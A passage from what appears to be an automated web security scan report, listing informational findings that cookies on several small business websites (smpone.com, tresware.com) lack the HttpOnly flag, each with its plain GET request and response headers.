TresCMS[last_visit_temp]=1303733875; expires=Mon, 25-Apr-2011 12:27:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-20.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.2.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733869

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:17:55 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733875; expires=Mon, 25-Apr-2011 12:27:55 GMT; path=/
Content-Type: text/html
Content-Length: 12151

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Services</title>
<meta http-equiv="Content-T
...[SNIP]...

16.195. http://www.smpone.com/Sections-read-21.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-21.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
TresCMS[last_visit_temp]=1303733974; expires=Mon, 25-Apr-2011 12:29:34 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-21.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-20.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.19.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733968

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:34 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733974; expires=Mon, 25-Apr-2011 12:29:34 GMT; path=/
Content-Type: text/html
Content-Length: 12723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Network Assessment</title>
<meta http-equiv=
...[SNIP]...

16.196. http://www.smpone.com/Sections-read-29.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-29.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
TresCMS[last_visit_temp]=1303733884; expires=Mon, 25-Apr-2011 12:28:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-29.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.5.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733882

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:04 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733884; expires=Mon, 25-Apr-2011 12:28:04 GMT; path=/
Content-Type: text/html
Content-Length: 12851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Digital Forensics</title>
<meta http-equiv="
...[SNIP]...

16.197. http://www.smpone.com/Sections-read-3.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-3.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
TresCMS[last_visit_temp]=1303733931; expires=Mon, 25-Apr-2011 12:28:51 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-3.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.11.10.1303732845; PHPSESSID=b07217b91d15829f50a400a4c700d48f; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733904

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:51 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733931; expires=Mon, 25-Apr-2011 12:28:51 GMT; path=/
Content-Type: text/html
Content-Length: 13520

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Directions</title>
<meta http-equiv="Content
...[SNIP]...

16.198. http://www.smpone.com/Sections-read-30.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-30.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
TresCMS[last_visit_temp]=1303733947; expires=Mon, 25-Apr-2011 12:29:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-30.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Static-contact.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=b07217b91d15829f50a400a4c700d48f; __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.14.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733938

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733947; expires=Mon, 25-Apr-2011 12:29:07 GMT; path=/
Content-Type: text/html
Content-Length: 12409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners - Industries</title>
<meta http-equiv="Content
...[SNIP]...

16.199. http://www.smpone.com/Sections-read-7.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Sections-read-7.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
TresCMS[last_visit_temp]=1303733887; expires=Mon, 25-Apr-2011 12:28:07 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Sections-read-7.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/images/menu_right.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.6.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733885

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:07 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733887; expires=Mon, 25-Apr-2011 12:28:07 GMT; path=/
Content-Type: text/html
Content-Length: 13924

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Risk Assess
...[SNIP]...

16.200. http://www.smpone.com/Static-contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smpone.com
Path:	/Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/Sections-read-126.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.10.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733897

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 14568

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Security Management Partners Information Security Consultants - Contact Inf
...[SNIP]...

16.201. http://www.tns-counter.ru/V13a***R%3E*vkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tns-counter.ru
Path:	/V13aR%3Evkontakte_ru/ru/UTF-8/tmsec=vkontakte_total/532617388**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

guid=CB6401004DB58327X1303741223; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.202. http://www.tresware.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=b8637d1e5bc7394c963fe8caf8da98b0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[ident]=b8637d1e5bc7394c963fe8caf8da98b0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:18:21 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733901; expires=Mon, 25-Apr-2011 12:28:21 GMT; path=/
Content-Type: text/html
Content-Length: 15860

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Website Development | Web Content Management | CMS | Web Design | New Jers
...[SNIP]...

16.203. http://www.tresware.com/CustomPHPProgrammingNJ.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/CustomPHPProgrammingNJ.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
TresCMS[last_visit_temp]=1303733986; expires=Mon, 25-Apr-2011 12:29:46 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /CustomPHPProgrammingNJ.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900; igyi[s]=885141303733914696

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:19:46 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit]=0; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[timezone]=EDT; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:19:46 GMT; path=/
Set-Cookie: TresCMS[last_visit_temp]=1303733986; expires=Mon, 25-Apr-2011 12:29:46 GMT; path=/
Content-Type: text/html
Content-Length: 14485

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Custom PHP Programming | Website PHP Development | Custom PHP Development
...[SNIP]...

16.204. http://www.tresware.com/Static-contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tresware.com
Path:	/Static-contact.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
TresCMS[user_ip]=173.193.214.243; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
TresCMS[last_visit_temp]=1303734004; expires=Mon, 25-Apr-2011 12:30:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Static-contact.html HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/webcontentmanagementNJ.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: igyi[s]=885141303733914696; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733993

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:20:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Set-Cookie: TresCMS[tres_uid]=1; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[tres_group]=0; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
Set-Cookie: TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; expires=Tue, 24-Apr-2012 12:20:04 GMT; path=/
